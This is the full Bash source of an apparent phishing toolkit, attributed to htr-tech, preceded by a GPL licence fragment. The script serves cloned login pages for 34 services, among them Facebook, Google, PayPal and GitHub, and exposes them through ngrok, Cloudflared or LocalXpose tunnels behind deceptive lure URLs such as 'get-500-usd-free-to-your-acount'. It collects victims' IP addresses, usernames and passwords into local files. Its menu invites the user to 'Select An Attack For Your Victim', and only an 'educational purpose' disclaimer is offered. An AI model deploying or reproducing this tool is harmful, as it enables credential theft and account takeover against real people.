    stand ready to extend this provision to those domains in future versions

    of the GPL, as needed to protect the freedom of users.

    Finally, every program is threatened constantly by software patents.

    States should not allow patents to restrict development and use of

    software on general-purpose computers, but in those that do, we wish to

    avoid the special danger that patents applied to a free program could

    make it effectively proprietary.  To prevent this, the GPL assures that

    patents cannot be used to render the program non-free.

    The precise terms and conditions for copying, distribution and

    modification follow.

      Copyright (C) 2022  HTR-TECH (


   1RaY-1 -

   Aditya Shakya -

   Ali Milani Amin -

   Ignitetch  -

   Moises Tapia -

   Mustakim Ahmed -

   TheLinuxChoice -


 ANSI colors (FG & BG)

RED="$(printf '\033[31m')"  GREEN="$(printf '\033[32m')"  ORANGE="$(printf '\033[33m')"  BLUE="$(printf '\033[34m')" MAGENTA="$(printf '\033[35m')"  CYAN="$(printf '\033[36m')"  WHITE="$(printf '\033[37m')" BLACK="$(printf '\033[30m')" REDBG="$(printf '\033[41m')"  GREENBG="$(printf '\033[42m')"  ORANGEBG="$(printf '\033[43m')"  BLUEBG="$(printf '\033[44m')" MAGENTABG="$(printf '\033[45m')"  CYANBG="$(printf '\033[46m')"  WHITEBG="$(printf '\033[47m')" BLACKBG="$(printf '\033[40m')" RESETBG="$(printf '\e[0m\n')"


if [[ ! -d ".server" ]]; then         mkdir -p ".server" fi

if [[ ! -d "auth" ]]; then         mkdir -p "auth" fi

if [[ -d ".server/www" ]]; then         rm -rf ".server/www"         mkdir -p ".server/www" else         mkdir -p ".server/www" fi

 Remove logfile

if [[ -e ".server/.loclx" ]]; then         rm -rf ".server/.loclx" fi

if [[ -e ".server/.cld.log" ]]; then         rm -rf ".server/.cld.log" fi

 Script termination

exit_on_signal_SIGINT() {         { printf "\n\n%s\n\n" "${RED}[${WHITE}!${RED}]${RED} Program Interrupted." 2>&1; reset_color; }         exit 0 }

exit_on_signal_SIGTERM() {         { printf "\n\n%s\n\n" "${RED}[${WHITE}!${RED}]${RED} Program Terminated." 2>&1; reset_color; }         exit 0 }

trap exit_on_signal_SIGINT SIGINT trap exit_on_signal_SIGTERM SIGTERM

 Reset terminal colors

reset_color() {         tput sgr0   # reset attributes         tput op     # reset color         return }

 Kill already running process

kill_pid() {         check_PID="php ngrok cloudflared loclx"         for process in ${check_PID}; do                 if [[ $(pidof ${process}) ]]; then # Check for Process                         killall ${process} > /dev/null 2>&1 # Kill the Process                 fi         done }


banner() {         cat <<- EOF                 ${ORANGE}                 ${ORANGE} __                _                                ${ORANGE}|  /     | |   ()   | |                               ${ORANGE}   / /   | |   | |    _                   ${ORANGE}  / / | ' | ' | / | ' \ /  \ '|                 ${ORANGE} / /| |) | | | | _ \ | | |  / |                    ${ORANGE}/___| ./|| ||_|__/| ||\||                    ${ORANGE}      | |                                                 ${ORANGE}      ||                ${RED}Version : ${version}

                ${GREEN}[${WHITE}-${GREEN}]${CYAN} Tool Created by htr-tech (tahmid.rayat)${WHITE}         EOF }

 Small Banner

banner_small() {         cat <<- EOF                 ${BLUE}                 ${BLUE}  ░▀▀█░█▀█░█░█░▀█▀░█▀▀░█░█░█▀▀░█▀▄                 ${BLUE}  ░▄▀░░█▀▀░█▀█░░█░░▀▀█░█▀█░█▀▀░█▀▄                 ${BLUE}  ░▀▀▀░▀░░░▀░▀░▀▀▀░▀▀▀░▀░▀░▀▀▀░▀░▀${WHITE} ${version}         EOF }


dependencies() {         echo -e "\n${GREEN}[${WHITE}+${GREEN}]${CYAN} Installing required packages..."

        if [[ -d "/data/data/com.termux/files/home" ]]; then                 if [[ ! $(command -v proot) ]]; then                         echo -e "\n${GREEN}[${WHITE}+${GREEN}]${CYAN} Installing package : ${ORANGE}proot${CYAN}"${WHITE}                         pkg install proot resolv-conf -y                 fi

                if [[ ! $(command -v tput) ]]; then                         echo -e "\n${GREEN}[${WHITE}+${GREEN}]${CYAN} Installing package : ${ORANGE}ncurses-utils${CYAN}"${WHITE}                         pkg install ncurses-utils -y                 fi         fi

        if [[ $(command -v php) && $(command -v curl) && $(command -v unzip) ]]; then                 echo -e "\n${GREEN}[${WHITE}+${GREEN}]${GREEN} Packages already installed."         else                 pkgs=(php curl unzip)                 for pkg in "${pkgs[@]}"; do                         type -p "$pkg" &>/dev/null || {                                 echo -e "\n${GREEN}[${WHITE}+${GREEN}]${CYAN} Installing package : ${ORANGE}$pkg${CYAN}"${WHITE}                                 if [[ $(command -v pkg) ]]; then                                         pkg install "$pkg" -y                                 elif [[ $(command -v apt) ]]; then                                         sudo apt install "$pkg" -y                                 elif [[ $(command -v apt-get) ]]; then                                         sudo apt-get install "$pkg" -y                                 elif [[ $(command -v pacman) ]]; then                                         sudo pacman -S "$pkg" --noconfirm                                 elif [[ $(command -v dnf) ]]; then                                         sudo dnf -y install "$pkg"                                 elif [[ $(command -v yum) ]]; then                                         sudo yum -y install "$pkg"                                 else                                         echo -e "\n${RED}[${WHITE}!${RED}]${RED} Unsupported package manager, Install packages manually."                                         { reset_color; exit 1; }                                 fi                         }                 done         fi }

 Download Binaries

download() {         url="$1"         output="$2"         file=basename $url         if [[ -e "$file" || -e "$output" ]]; then                 rm -rf "$file" "$output"         fi         curl --silent --insecure --fail --retry-connrefused \                 --retry 3 --retry-delay 2 --location --output "${file}" "${url}"

        if [[ -e "$file" ]]; then                 if [[ ${file#.} == "zip" ]]; then                         unzip -qq $file > /dev/null 2>&1                         mv -f $output .server/$output > /dev/null 2>&1                 elif [[ ${file#.} == "tgz" ]]; then                         tar -zxf $file > /dev/null 2>&1                         mv -f $output .server/$output > /dev/null 2>&1                 else                         mv -f $file .server/$output > /dev/null 2>&1                 fi                 chmod +x .server/$output > /dev/null 2>&1                 rm -rf "$file"         else                 echo -e "\n${RED}[${WHITE}!${RED}]${RED} Error occured while downloading ${output}."                 { reset_color; exit 1; }         fi }

 Install ngrok

install_ngrok() {         if [[ -e ".server/ngrok" ]]; then                 echo -e "\n${GREEN}[${WHITE}+${GREEN}]${GREEN} Ngrok already installed."         else                 echo -e "\n${GREEN}[${WHITE}+${GREEN}]${CYAN} Installing ngrok..."${WHITE}                 arch=uname -m                 if [[ ("$arch" == 'arm') || ("$arch" == 'Android') ]]; then                         download '' 'ngrok'                 elif [[ "$arch" == 'aarch64' ]]; then                         download '' 'ngrok'                 elif [[ "$arch" == 'x86_64' ]]; then                         download '' 'ngrok'                 else                         download '' 'ngrok'                 fi         fi }

 Install Cloudflared

install_cloudflared() {         if [[ -e ".server/cloudflared" ]]; then                 echo -e "\n${GREEN}[${WHITE}+${GREEN}]${GREEN} Cloudflared already installed."         else                 echo -e "\n${GREEN}[${WHITE}+${GREEN}]${CYAN} Installing Cloudflared..."${WHITE}                 arch=uname -m                 if [[ ("$arch" == 'arm') || ("$arch" == 'Android') ]]; then                         download '' 'cloudflared'                 elif [[ "$arch" == 'aarch64' ]]; then                         download '' 'cloudflared'                 elif [[ "$arch" == 'x86_64' ]]; then                         download '' 'cloudflared'                 else                         download '' 'cloudflared'                 fi         fi }

 Install LocalXpose

install_localxpose() {         if [[ -e ".server/loclx" ]]; then                 echo -e "\n${GREEN}[${WHITE}+${GREEN}]${GREEN} LocalXpose already installed."         else                 echo -e "\n${GREEN}[${WHITE}+${GREEN}]${CYAN} Installing LocalXpose..."${WHITE}                 arch=uname -m                 if [[ ("$arch" == 'arm') || ("$arch" == 'Android') ]]; then                         download '' 'loclx'                 elif [[ "$arch" == 'aarch64' ]]; then                         download '' 'loclx'                 elif [[ "$arch" == 'x86_64' ]]; then                         download '' 'loclx'                 else                         download '' 'loclx'                 fi         fi }

 Exit message

msg_exit() {         { clear; banner; echo; }         echo -e "${GREENBG}${BLACK} Thank you for using this tool. Have a good day.${RESETBG}\n"         { reset_color; exit 0; } }


about() {         { clear; banner; echo; }         cat <<- EOF                 ${GREEN} Author   ${RED}:  ${ORANGE}TAHMID RAYAT ${RED}[ ${ORANGE}HTR-TECH ${RED}]                 ${GREEN} Github   ${RED}:  ${CYAN}                 ${GREEN} Social   ${RED}:  ${CYAN}                 ${GREEN} Version  ${RED}:  ${ORANGE}${version}

                ${WHITE} ${REDBG}Warning:${RESETBG}                 ${CYAN}  This Tool is made for educational purpose                    only ${RED}!${WHITE}${CYAN} Author will not be responsible for                    any misuse of this toolkit ${RED}!${WHITE}                                  ${WHITE} ${CYANBG}Special Thanks to:${RESETBG}                 ${GREEN}  1RaY-1, Adi1090x, AliMilani, BDhackers009,                   KasRoudra, sepp0, ThelinuxChoice, Yisus7u7

                ${RED}[${WHITE}00${RED}]${ORANGE} Main Menu     ${RED}[${WHITE}99${RED}]${ORANGE} Exit


        read -p "${RED}[${WHITE}-${RED}]${GREEN} Select an option : ${BLUE}"         case $REPLY in                  99)                         msg_exit;;                 0 | 00)                         echo -ne "\n${GREEN}[${WHITE}+${GREEN}]${CYAN} Returning to main menu..."                         { sleep 1; main_menu; };;                 *)                         echo -ne "\n${RED}[${WHITE}!${RED}]${RED} Invalid Option, Try Again..."                         { sleep 1; about; };;         esac }

 Setup website and start php server

HOST='' PORT='8080'

setup_site() {         echo -e "\n${RED}[${WHITE}-${RED}]${BLUE} Setting up server..."${WHITE}         cp -rf .sites/"$website"/* .server/www         cp -f .sites/ip.php .server/www/         echo -ne "\n${RED}[${WHITE}-${RED}]${BLUE} Starting PHP server..."${WHITE}         cd .server/www && php -S "$HOST":"$PORT" > /dev/null 2>&1 &  }

 Get IP address

capture_ip() {         IP=$(grep -a 'IP:' .server/www/ip.txt | cut -d " " -f2 | tr -d '\r')         IFS=$'\n'         echo -e "\n${RED}[${WHITE}-${RED}]${GREEN} Victim's IP : ${BLUE}$IP"         echo -ne "\n${RED}[${WHITE}-${RED}]${BLUE} Saved in : ${ORANGE}auth/ip.txt"         cat .server/www/ip.txt >> auth/ip.txt }

 Get credentials

capture_creds() {         ACCOUNT=$(grep -o 'Username:.' .server/www/usernames.txt | awk '{print $2}')         PASSWORD=$(grep -o 'Pass:.' .server/www/usernames.txt | awk -F ":." '{print $NF}')         IFS=$'\n'         echo -e "\n${RED}[${WHITE}-${RED}]${GREEN} Account : ${BLUE}$ACCOUNT"         echo -e "\n${RED}[${WHITE}-${RED}]${GREEN} Password : ${BLUE}$PASSWORD"         echo -e "\n${RED}[${WHITE}-${RED}]${BLUE} Saved in : ${ORANGE}auth/usernames.dat"         cat .server/www/usernames.txt >> auth/usernames.dat         echo -ne "\n${RED}[${WHITE}-${RED}]${ORANGE} Waiting for Next Login Info, ${BLUE}Ctrl + C ${ORANGE}to exit. " }

 Print data

capture_data() {         echo -ne "\n${RED}[${WHITE}-${RED}]${ORANGE} Waiting for Login Info, ${BLUE}Ctrl + C ${ORANGE}to exit..."         while true; do                 if [[ -e ".server/www/ip.txt" ]]; then                         echo -e "\n\n${RED}[${WHITE}-${RED}]${GREEN} Victim IP Found !"                         capture_ip                         rm -rf .server/www/ip.txt                 fi                 sleep 0.75                 if [[ -e ".server/www/usernames.txt" ]]; then                         echo -e "\n\n${RED}[${WHITE}-${RED}]${GREEN} Login info Found !!"                         capture_creds                         rm -rf .server/www/usernames.txt                 fi                 sleep 0.75         done }

 Start ngrok

start_ngrok() {         echo -e "\n${RED}[${WHITE}-${RED}]${GREEN} Initializing... ${GREEN}( ${CYAN}http://$HOST:$PORT ${GREEN})"         { sleep 1; setup_site; }         echo -e "\n"         read -n1 -p "${RED}[${WHITE}-${RED}]${ORANGE} Change Ngrok Server Region? ${GREEN}[${CYAN}y${GREEN}/${CYAN}N${GREEN}]:${ORANGE} " opinion         [[ ${opinion,,} == "y" ]] && ngrok_region="eu" || ngrok_region="us"         echo -e "\n\n${RED}[${WHITE}-${RED}]${GREEN} Launching Ngrok..."

        if [[ command -v termux-chroot ]]; then                 sleep 2 && termux-chroot ./.server/ngrok http --region ${ngrok_region} "$HOST":"$PORT" --log=stdout > /dev/null 2>&1 &         else                 sleep 2 && ./.server/ngrok http --region ${ngrok_region} "$HOST":"$PORT" --log=stdout > /dev/null 2>&1 &         fi

        { sleep 8; clear; banner_small; }         ngrok_url=$(curl -s -N | grep -Eo '(https)://[^/"]+(')         ngrok_url1=${ngrok_url#https://}         echo -e "\n${RED}[${WHITE}-${RED}]${BLUE} URL 1 : ${GREEN}$ngrok_url"         echo -e "\n${RED}[${WHITE}-${RED}]${BLUE} URL 2 : ${GREEN}$mask@$ngrok_url1"         capture_data }

 Start Cloudflared

start_cloudflared() {      rm .cld.log > /dev/null 2>&1 &         echo -e "\n${RED}[${WHITE}-${RED}]${GREEN} Initializing... ${GREEN}( ${CYAN}http://$HOST:$PORT ${GREEN})"         { sleep 1; setup_site; }         echo -ne "\n\n${RED}[${WHITE}-${RED}]${GREEN} Launching Cloudflared..."

        if [[ command -v termux-chroot ]]; then                 sleep 2 && termux-chroot ./.server/cloudflared tunnel -url "$HOST":"$PORT" --logfile .server/.cld.log > /dev/null 2>&1 &         else                 sleep 2 && ./.server/cloudflared tunnel -url "$HOST":"$PORT" --logfile .server/.cld.log > /dev/null 2>&1 &         fi

        { sleep 8; clear; banner_small; }                  cldflr_link=$(grep -o 'https://[-0-9a-z]*\' ".server/.cld.log")         cldflr_link1=${cldflr_link#https://}         echo -e "\n${RED}[${WHITE}-${RED}]${BLUE} URL 1 : ${GREEN}$cldflr_link"         echo -e "\n${RED}[${WHITE}-${RED}]${BLUE} URL 2 : ${GREEN}$mask@$cldflr_link1"         capture_data }

localxpose_auth() {         ./.server/loclx -help > /dev/null 2>&1 &         sleep 1         [ -d ".localxpose" ] && auth_f=".localxpose/.access" || auth_f="$HOME/.localxpose/.access" 

        [ "$(./.server/loclx account status | grep Error)" ] && {                 echo -e "\n\n${RED}[${WHITE}!${RED}]${GREEN} Create an account on ${ORANGE}${GREEN} & copy the token\n"                 sleep 3                 read -p "${RED}[${WHITE}-${RED}]${ORANGE} Input Loclx Token :${ORANGE} " loclx_token                 [[ $loclx_token == "" ]] && {                         echo -e "\n${RED}[${WHITE}!${RED}]${RED} You have to input Localxpose Token." ; sleep 2 ; tunnel_menu                 } || {                         echo -n "$loclx_token" > $auth_f 2> /dev/null                 }         } }

 Start LocalXpose (Again...)

start_loclx() {         echo -e "\n${RED}[${WHITE}-${RED}]${GREEN} Initializing... ${GREEN}( ${CYAN}http://$HOST:$PORT ${GREEN})"         { sleep 1; setup_site; localxpose_auth; }         echo -e "\n"         read -n1 -p "${RED}[${WHITE}-${RED}]${ORANGE} Change Loclx Server Region? ${GREEN}[${CYAN}y${GREEN}/${CYAN}N${GREEN}]:${ORANGE} " opinion         [[ ${opinion,,} == "y" ]] && loclx_region="eu" || loclx_region="us"         echo -e "\n\n${RED}[${WHITE}-${RED}]${GREEN} Launching LocalXpose..."

        if [[ command -v termux-chroot ]]; then                 sleep 1 && termux-chroot ./.server/loclx tunnel --raw-mode http --region ${loclx_region} --https-redirect -t "$HOST":"$PORT" > .server/.loclx 2>&1 &         else                 sleep 1 && ./.server/loclx tunnel --raw-mode http --region ${loclx_region} --https-redirect -t "$HOST":"$PORT" > .server/.loclx 2>&1 &         fi

        { sleep 12; clear; banner_small; }         loclx_url=$(cat .server/.loclx | grep -o '[0-9a-zA-Z.]*') #DONE :)         echo -e "\n${RED}[${WHITE}-${RED}]${BLUE} URL 1 : ${GREEN}http://$loclx_url"         echo -e "\n${RED}[${WHITE}-${RED}]${BLUE} URL 2 : ${GREEN}$mask@$loclx_url"         capture_data }

 Start localhost

start_localhost() {         echo -e "\n${RED}[${WHITE}-${RED}]${GREEN} Initializing... ${GREEN}( ${CYAN}http://$HOST:$PORT ${GREEN})"         setup_site         { sleep 1; clear; banner_small; }         echo -e "\n${RED}[${WHITE}-${RED}]${GREEN} Successfully Hosted at : ${GREEN}${CYAN}http://$HOST:$PORT ${GREEN}"         capture_data }

 Tunnel selection

tunnel_menu() {         { clear; banner_small; }         cat <<- EOF

                ${RED}[${WHITE}01${RED}]${ORANGE} Localhost                 ${RED}[${WHITE}02${RED}]${ORANGE}     ${RED}[${CYAN}Account Needed${RED}]                 ${RED}[${WHITE}03${RED}]${ORANGE} Cloudflared  ${RED}[${CYAN}Auto Detects${RED}]                 ${RED}[${WHITE}04${RED}]${ORANGE} LocalXpose   ${RED}[${CYAN}NEW! Max 15Min${RED}]


        read -p "${RED}[${WHITE}-${RED}]${GREEN} Select a port forwarding service : ${BLUE}"

        case $REPLY in                  1 | 01)                         start_localhost;;                 2 | 02)                         start_ngrok;;                 3 | 03)                         start_cloudflared;;                 4 | 04)                         start_loclx;;                 *)                         echo -ne "\n${RED}[${WHITE}!${RED}]${RED} Invalid Option, Try Again..."                         { sleep 1; tunnel_menu; };;         esac }


site_facebook() {         cat <<- EOF

                ${RED}[${WHITE}01${RED}]${ORANGE} Traditional Login Page                 ${RED}[${WHITE}02${RED}]${ORANGE} Advanced Voting Poll Login Page                 ${RED}[${WHITE}03${RED}]${ORANGE} Fake Security Login Page                 ${RED}[${WHITE}04${RED}]${ORANGE} Facebook Messenger Login Page


        read -p "${RED}[${WHITE}-${RED}]${GREEN} Select an option : ${BLUE}"

        case $REPLY in                  1 | 01)                         website="facebook"                         mask='http://blue-verified-badge-for-facebook-free'                         tunnel_menu;;                 2 | 02)                         website="fb_advanced"                         mask='http://vote-for-the-best-social-media'                         tunnel_menu;;                 3 | 03)                         website="fb_security"                         mask='http://make-your-facebook-secured-and-free-from-hackers'                         tunnel_menu;;                 4 | 04)                         website="fb_messenger"                         mask='http://get-messenger-premium-features-free'                         tunnel_menu;;                 *)                         echo -ne "\n${RED}[${WHITE}!${RED}]${RED} Invalid Option, Try Again..."                         { sleep 1; clear; banner_small; site_facebook; };;         esac }


site_instagram() {         cat <<- EOF

                ${RED}[${WHITE}01${RED}]${ORANGE} Traditional Login Page                 ${RED}[${WHITE}02${RED}]${ORANGE} Auto Followers Login Page                 ${RED}[${WHITE}03${RED}]${ORANGE} 1000 Followers Login Page                 ${RED}[${WHITE}04${RED}]${ORANGE} Blue Badge Verify Login Page


        read -p "${RED}[${WHITE}-${RED}]${GREEN} Select an option : ${BLUE}"

        case $REPLY in                  1 | 01)                         website="instagram"                         mask='http://get-unlimited-followers-for-instagram'                         tunnel_menu;;                 2 | 02)                         website="ig_followers"                         mask='http://get-unlimited-followers-for-instagram'                         tunnel_menu;;                 3 | 03)                         website="insta_followers"                         mask='http://get-1000-followers-for-instagram'                         tunnel_menu;;                 4 | 04)                         website="ig_verify"                         mask='http://blue-badge-verify-for-instagram-free'                         tunnel_menu;;                 *)                         echo -ne "\n${RED}[${WHITE}!${RED}]${RED} Invalid Option, Try Again..."                         { sleep 1; clear; banner_small; site_instagram; };;         esac }


site_gmail() {         cat <<- EOF

                ${RED}[${WHITE}01${RED}]${ORANGE} Gmail Old Login Page                 ${RED}[${WHITE}02${RED}]${ORANGE} Gmail New Login Page                 ${RED}[${WHITE}03${RED}]${ORANGE} Advanced Voting Poll


        read -p "${RED}[${WHITE}-${RED}]${GREEN} Select an option : ${BLUE}"

        case $REPLY in                  1 | 01)                         website="google"                         mask='http://get-unlimited-google-drive-free'                         tunnel_menu;;                                 2 | 02)                         website="google_new"                         mask='http://get-unlimited-google-drive-free'                         tunnel_menu;;                 3 | 03)                         website="google_poll"                         mask='http://vote-for-the-best-social-media'                         tunnel_menu;;                 *)                         echo -ne "\n${RED}[${WHITE}!${RED}]${RED} Invalid Option, Try Again..."                         { sleep 1; clear; banner_small; site_gmail; };;         esac }


site_vk() {         cat <<- EOF

                ${RED}[${WHITE}01${RED}]${ORANGE} Traditional Login Page                 ${RED}[${WHITE}02${RED}]${ORANGE} Advanced Voting Poll Login Page


        read -p "${RED}[${WHITE}-${RED}]${GREEN} Select an option : ${BLUE}"

        case $REPLY in                  1 | 01)                         website="vk"                         mask='http://vk-premium-real-method-2020'                         tunnel_menu;;                 2 | 02)                         website="vk_poll"                         mask='http://vote-for-the-best-social-media'                         tunnel_menu;;                 *)                         echo -ne "\n${RED}[${WHITE}!${RED}]${RED} Invalid Option, Try Again..."                         { sleep 1; clear; banner_small; site_vk; };;         esac }


main_menu() {         { clear; banner; echo; }         cat <<- EOF                 ${RED}[${WHITE}::${RED}]${ORANGE} Select An Attack For Your Victim ${RED}[${WHITE}::${RED}]${ORANGE}

                ${RED}[${WHITE}01${RED}]${ORANGE} Facebook      ${RED}[${WHITE}11${RED}]${ORANGE} Twitch       ${RED}[${WHITE}21${RED}]${ORANGE} DeviantArt                 ${RED}[${WHITE}02${RED}]${ORANGE} Instagram     ${RED}[${WHITE}12${RED}]${ORANGE} Pinterest    ${RED}[${WHITE}22${RED}]${ORANGE} Badoo                 ${RED}[${WHITE}03${RED}]${ORANGE} Google        ${RED}[${WHITE}13${RED}]${ORANGE} Snapchat     ${RED}[${WHITE}23${RED}]${ORANGE} Origin                 ${RED}[${WHITE}04${RED}]${ORANGE} Microsoft     ${RED}[${WHITE}14${RED}]${ORANGE} Linkedin     ${RED}[${WHITE}24${RED}]${ORANGE} DropBox                         ${RED}[${WHITE}05${RED}]${ORANGE} Netflix       ${RED}[${WHITE}15${RED}]${ORANGE} Ebay         ${RED}[${WHITE}25${RED}]${ORANGE} Yahoo                                 ${RED}[${WHITE}06${RED}]${ORANGE} Paypal        ${RED}[${WHITE}16${RED}]${ORANGE} Quora        ${RED}[${WHITE}26${RED}]${ORANGE} Wordpress                 ${RED}[${WHITE}07${RED}]${ORANGE} Steam         ${RED}[${WHITE}17${RED}]${ORANGE} Protonmail   ${RED}[${WHITE}27${RED}]${ORANGE} Yandex                                         ${RED}[${WHITE}08${RED}]${ORANGE} Twitter       ${RED}[${WHITE}18${RED}]${ORANGE} Spotify      ${RED}[${WHITE}28${RED}]${ORANGE} StackoverFlow                 ${RED}[${WHITE}09${RED}]${ORANGE} Playstation   ${RED}[${WHITE}19${RED}]${ORANGE} Reddit       ${RED}[${WHITE}29${RED}]${ORANGE} Vk                 ${RED}[${WHITE}10${RED}]${ORANGE} Tiktok        ${RED}[${WHITE}20${RED}]${ORANGE} Adobe        ${RED}[${WHITE}30${RED}]${ORANGE} XBOX                 ${RED}[${WHITE}31${RED}]${ORANGE} Mediafire     ${RED}[${WHITE}32${RED}]${ORANGE} Gitlab       ${RED}[${WHITE}33${RED}]${ORANGE} Github                 ${RED}[${WHITE}34${RED}]${ORANGE} Discord

                ${RED}[${WHITE}99${RED}]${ORANGE} About         ${RED}[${WHITE}00${RED}]${ORANGE} Exit

        EOF                  read -p "${RED}[${WHITE}-${RED}]${GREEN} Select an option : ${BLUE}"

        case $REPLY in                  1 | 01)                         site_facebook;;                 2 | 02)                         site_instagram;;                 3 | 03)                         site_gmail;;                 4 | 04)                         website="microsoft"                         mask='http://unlimited-onedrive-space-for-free'                         tunnel_menu;;                 5 | 05)                         website="netflix"                         mask='http://upgrade-your-netflix-plan-free'                         tunnel_menu;;                 6 | 06)                         website="paypal"                         mask='http://get-500-usd-free-to-your-acount'                         tunnel_menu;;                 7 | 07)                         website="steam"                         mask='http://steam-500-usd-gift-card-free'                         tunnel_menu;;                 8 | 08)                         website="twitter"                         mask='http://get-blue-badge-on-twitter-free'                         tunnel_menu;;                 9 | 09)                         website="playstation"                         mask='http://playstation-500-usd-gift-card-free'                         tunnel_menu;;                 10)                         website="tiktok"                         mask='http://tiktok-free-liker'                         tunnel_menu;;                 11)                         website="twitch"                         mask='http://unlimited-twitch-tv-user-for-free'                         tunnel_menu;;                 12)                         website="pinterest"                         mask='http://get-a-premium-plan-for-pinterest-free'                         tunnel_menu;;                 13)                         website="snapchat"                         mask='http://view-locked-snapchat-accounts-secretly'                         tunnel_menu;;                 14)                         website="linkedin"                         mask='http://get-a-premium-plan-for-linkedin-free'                         tunnel_menu;;                 15)                         website="ebay"                         mask='http://get-500-usd-free-to-your-acount'                         tunnel_menu;;                 16)                         website="quora"                         mask='http://quora-premium-for-free'                         tunnel_menu;;                 17)                         website="protonmail"                         mask='http://protonmail-pro-basics-for-free'                         tunnel_menu;;                 18)                         website="spotify"                         mask='http://convert-your-account-to-spotify-premium'                         tunnel_menu;;                 19)                         website="reddit"                         mask='http://reddit-official-verified-member-badge'                         tunnel_menu;;                 20)                         website="adobe"                         mask='http://get-adobe-lifetime-pro-membership-free'                         tunnel_menu;;                 21)                         website="deviantart"                         mask='http://get-500-usd-free-to-your-acount'                         tunnel_menu;;                 22)                         website="badoo"                         mask='http://get-500-usd-free-to-your-acount'                         tunnel_menu;;                 23)                         website="origin"                         mask='http://get-500-usd-free-to-your-acount'                         tunnel_menu;;                 24)                         website="dropbox"                         mask='http://get-1TB-cloud-storage-free'                         tunnel_menu;;                 25)                         website="yahoo"                         mask='http://grab-mail-from-anyother-yahoo-account-free'                         tunnel_menu;;                 26)                         website="wordpress"                         mask='http://unlimited-wordpress-traffic-free'                         tunnel_menu;;                 27)                         website="yandex"                         mask='http://grab-mail-from-anyother-yandex-account-free'                         tunnel_menu;;                 28)                         website="stackoverflow"                         mask='http://get-stackoverflow-lifetime-pro-membership-free'                         tunnel_menu;;                 29)                         site_vk;;                 30)                         website="xbox"                         mask='http://get-500-usd-free-to-your-acount'                         tunnel_menu;;                 31)                         website="mediafire"                         mask='http://get-1TB-on-mediafire-free'                         tunnel_menu;;                 32)                         website="gitlab"                         mask='http://get-1k-followers-on-gitlab-free'                         tunnel_menu;;                 33)                         website="github"                         mask='http://get-1k-followers-on-github-free'                         tunnel_menu;;                 34)                         website="discord"                         mask='http://get-discord-nitro-free'                         tunnel_menu;;                 99)                         about;;                 0 | 00 )                         msg_exit;;                 *)                         echo -ne "\n${RED}[${WHITE}!${RED}]${RED} Invalid Option, Try Again..."                         { sleep 1; main_menu; };;                  esac }


kill_pid dependencies install_ngrok install_cloudflared install_localxpose main_menu

github-actions[bot] commented 1 year ago

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